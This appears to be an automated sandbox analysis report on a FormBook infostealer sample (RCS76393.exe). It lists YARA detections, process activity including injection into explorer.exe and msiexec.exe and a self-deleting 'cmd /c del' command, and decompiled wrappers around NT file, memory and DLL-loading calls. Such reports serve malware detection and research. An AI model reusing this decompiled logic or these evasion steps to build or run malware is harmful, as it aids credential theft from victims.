                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang
                                                                    Apr 8, 2021 12:47:38.990087032 CEST6436INData Raw: 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                                    Data Ascii: ed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:12:45:47
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:45:48
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:45:51
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff6f22f0000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:03
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                    Imagebase:0x1a0000
                                                                    File size:59904 bytes
                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:08
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x2a0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:12
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Executed Functions

                                                                      C-Code - Quality: 37%
                                                                      			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                      				void* _t18;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      
                                                                      				_t13 = _a4;
                                                                      				_t28 = _a4 + 0xc48;
                                                                      				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                      				_t6 =  &_a32; // 0x413d52
                                                                      				_t12 =  &_a8; // 0x413d52
                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                      				return _t18;
                                                                      			}






                                                                      0x00418273
                                                                      0x0041827f
                                                                      0x00418287
                                                                      0x00418292
                                                                      0x004182ad
                                                                      0x004182b5
                                                                      0x004182b9

                                                                      APIs
                                                                      • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: R=A$R=A
                                                                      • API String ID: 2738559852-3742021989
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0041826B(void* __eax, void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                      				void* _t21;
                                                                      				void* _t32;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t35;
                                                                      
                                                                      				 *(__eax - 0x1374aa1a) =  *(__eax - 0x1374aa1a) << 0x8b;
                                                                      				_t16 = _a4;
                                                                      				_t33 = _a4 + 0xc48;
                                                                      				E00418DC0(__ebx, _a4, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                                      				_t8 =  &_a32; // 0x413d52
                                                                      				_t14 =  &_a8; // 0x413d52
                                                                      				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t32, _t35); // executed
                                                                      				return _t21;
                                                                      			}







                                                                      0x0041826d
                                                                      0x00418273
                                                                      0x0041827f
                                                                      0x00418287
                                                                      0x00418292
                                                                      0x004182ad
                                                                      0x004182b5
                                                                      0x004182b9

                                                                      APIs
                                                                      • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: R=A$R=A
                                                                      • API String ID: 2738559852-3742021989
                                                                      • Opcode ID: d3c08aeb76a73d5e8864424ed4c1c39099f50e8e6a3d0b23c4bbf73bc67bcac2
                                                                      • Instruction ID: 63e6daace385307bb464b3db5f40c3fc627aba013f5e7f2710f4be0d336b7d24
                                                                      • Opcode Fuzzy Hash: d3c08aeb76a73d5e8864424ed4c1c39099f50e8e6a3d0b23c4bbf73bc67bcac2
                                                                      • Instruction Fuzzy Hash: 9BF01DB2200144ABCB04DF99D884CEB77ADAF8D214B15878DFA5C97252C630E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0041839A(void* __eax, PVOID* _a4, long _a8, long* _a12, long _a16, long _a20) {
                                                                      				void* _v0;
                                                                      				intOrPtr _v4;
                                                                      				long _t15;
                                                                      				void* _t22;
                                                                      
                                                                      				_push(ds);
                                                                      				_push(ss);
                                                                      				asm("loop 0x57");
                                                                      				_t11 = _v4;
                                                                      				_t3 = _t11 + 0xc60; // 0xca0
                                                                      				E00418DC0(_t22, _v4, _t3,  *((intOrPtr*)(_v4 + 0x10)), 0, 0x30);
                                                                      				_t15 = NtAllocateVirtualMemory(_v0, _a4, _a8, _a12, _a16, _a20); // executed
                                                                      				return _t15;
                                                                      			}







                                                                      0x0041839c
                                                                      0x0041839d
                                                                      0x0041839f
                                                                      0x004183a3
                                                                      0x004183af
                                                                      0x004183b7
                                                                      0x004183d9
                                                                      0x004183dd

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID: )zA
                                                                      • API String ID: 2167126740-483804167
                                                                      • Opcode ID: 12aa7b6a7ac5d9d695dfdf5ad5a69c62b8e3a847ded82aa49320dff1433ad2e2
                                                                      • Instruction ID: c9538b3fa8a4b8b9efc2b01c4422a6d87bf5dcef235acebc7d0053ce5330c01c
                                                                      • Opcode Fuzzy Hash: 12aa7b6a7ac5d9d695dfdf5ad5a69c62b8e3a847ded82aa49320dff1433ad2e2
                                                                      • Instruction Fuzzy Hash: 2E011AB5200208ABCB04DF98DC81EEB77ADEF88754F10850DFE1897241DA35E851CBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00409B20(void* _a4, intOrPtr _a8) {
                                                                      				char* _v8;
                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                      				char _v536;
                                                                      				void* _t15;
                                                                      				struct _OBJDIR_INFORMATION _t17;
                                                                      				struct _OBJDIR_INFORMATION _t18;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_v8 =  &_v536;
                                                                      				_t15 = E0041AB50(_a8,  &_v12, 0x104, _a8);
                                                                      				_t31 = _t30 + 0xc;
                                                                      				if(_t15 != 0) {
                                                                      					_t17 = E0041AF70(__eflags, _v8);
                                                                      					_t32 = _t31 + 4;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						E0041B1F0( &_v12, 0);
                                                                      						_t32 = _t32 + 8;
                                                                      					}
                                                                      					_t18 = E00419300(_v8);
                                                                      					_v16 = _t18;
                                                                      					__eflags = _t18;
                                                                      					if(_t18 == 0) {
                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                      						return _v16;
                                                                      					}
                                                                      					return _t18;
                                                                      				} else {
                                                                      					return _t15;
                                                                      				}
                                                                      			}













                                                                      0x00409b3c
                                                                      0x00409b3f
                                                                      0x00409b44
                                                                      0x00409b49
                                                                      0x00409b53
                                                                      0x00409b58
                                                                      0x00409b5b
                                                                      0x00409b5d
                                                                      0x00409b65
                                                                      0x00409b6a
                                                                      0x00409b6a
                                                                      0x00409b71
                                                                      0x00409b79
                                                                      0x00409b7c
                                                                      0x00409b7e
                                                                      0x00409b92
                                                                      0x00000000
                                                                      0x00409b94
                                                                      0x00409b9a
                                                                      0x00409b4e
                                                                      0x00409b4e
                                                                      0x00409b4e

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                      • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                      				long _t21;
                                                                      				void* _t31;
                                                                      
                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                      				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                      				return _t21;
                                                                      			}





                                                                      0x004181cf
                                                                      0x004181d7
                                                                      0x0041820d
                                                                      0x00418211

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                      				long _t14;
                                                                      				void* _t21;
                                                                      
                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                      				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                      				return _t14;
                                                                      			}





                                                                      0x004183af
                                                                      0x004183b7
                                                                      0x004183d9
                                                                      0x004183dd

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004182F0(intOrPtr _a4, void* _a8) {
                                                                      				long _t8;
                                                                      				void* _t11;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                      				_t3 = _t5 + 0xc50; // 0x409743
                                                                      				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                      				_t8 = NtClose(_a8); // executed
                                                                      				return _t8;
                                                                      			}





                                                                      0x004182f3
                                                                      0x004182f6
                                                                      0x004182ff
                                                                      0x00418307
                                                                      0x00418315
                                                                      0x00418319

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                                      • Instruction ID: 805eb357daac78acba7b1ddbc40b622d27022bec3dc3e7796499cd02f3b6cb89
                                                                      • Opcode Fuzzy Hash: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                                      • Instruction Fuzzy Hash: 2290026570100502D24171694444616000A97D0381F91C032A1014595ECA658992F171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 028da423b9d82a95cf7fca0aa8ca6cc8c618ffc768bca60d803f029dcdfd4f5b
                                                                      • Instruction ID: 290410979948eddf751ed96be0d59bbe9f7c9c0565da778d33a26746ad25b457
                                                                      • Opcode Fuzzy Hash: 028da423b9d82a95cf7fca0aa8ca6cc8c618ffc768bca60d803f029dcdfd4f5b
                                                                      • Instruction Fuzzy Hash: 6B90027530100413D25161694544707000997D0381F91C422A0414598D96968952F161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1555c7641540a3f0e030e2e107353c7545897e333335aff0200793f3eb503c55
                                                                      • Instruction ID: 7a6ea18da0d73e6da52ca4e08fb13e9e7e56090b0ef09c7d7c8c64ccb55d1192
                                                                      • Opcode Fuzzy Hash: 1555c7641540a3f0e030e2e107353c7545897e333335aff0200793f3eb503c55
                                                                      • Instruction Fuzzy Hash: 4A900265342041525685B16944445074006A7E0381791C022A1404990C85669856E661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e4a9fb299502241d8144f084072f6df997d099a131642f60c6fec483d58d63c2
                                                                      • Instruction ID: ff24f4abbd72a8d7703755405a9cda36a8a422549103b8ddb48c5b9a763ccb58
                                                                      • Opcode Fuzzy Hash: e4a9fb299502241d8144f084072f6df997d099a131642f60c6fec483d58d63c2
                                                                      • Instruction Fuzzy Hash: 8B9002A534100442D24061694454B060005D7E1341F51C025E1054594D8659CC52B166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0f4a14d6060ab2811462594daf324f98d5976ef906b1a9f8aa2b13295fd088cf
                                                                      • Instruction ID: a3edbfe77da89c07e5fb030969613d01f659f65a11952e03f46687cacc7e653a
                                                                      • Opcode Fuzzy Hash: 0f4a14d6060ab2811462594daf324f98d5976ef906b1a9f8aa2b13295fd088cf
                                                                      • Instruction Fuzzy Hash: 009002A530200003424571694454616400A97E0341B51C031E10045D0DC5658891B165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 18427c37b5ff7e1b3d8e402d5ff5799f8c344e782c155a0840cc3387f263d261
                                                                      • Instruction ID: 976f5f5dc5f2cd058fdeac6afae7e8ec698f0d5c89e797fa08b8b9b9a9726a3b
                                                                      • Opcode Fuzzy Hash: 18427c37b5ff7e1b3d8e402d5ff5799f8c344e782c155a0840cc3387f263d261
                                                                      • Instruction Fuzzy Hash: FD9002B530100402D28071694444746000597D0341F51C021A5054594E86998DD5B6A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bd446603fb89dd626b31d5463174b9b28d0d46e461bfa250f1b8d567112fc072
                                                                      • Instruction ID: 687352a623d9e066b8c2b643d0514c80faffe5799998153e74c69c6723f3b198
                                                                      • Opcode Fuzzy Hash: bd446603fb89dd626b31d5463174b9b28d0d46e461bfa250f1b8d567112fc072
                                                                      • Instruction Fuzzy Hash: 93900269311000030245A5690744507004697D5391351C031F1005590CD6618861A161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 68deefb8cdb356388787f6e0e543e2e76e14638a67440e8a0f8c8b498ad2c80a
                                                                      • Instruction ID: 5a1472c76643623322109f0822fd9a9ea389bac6edfb4363c2587dd174e8273d
                                                                      • Opcode Fuzzy Hash: 68deefb8cdb356388787f6e0e543e2e76e14638a67440e8a0f8c8b498ad2c80a
                                                                      • Instruction Fuzzy Hash: F890027530108802D2506169844474A000597D0341F55C421A4414698D86D58891B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
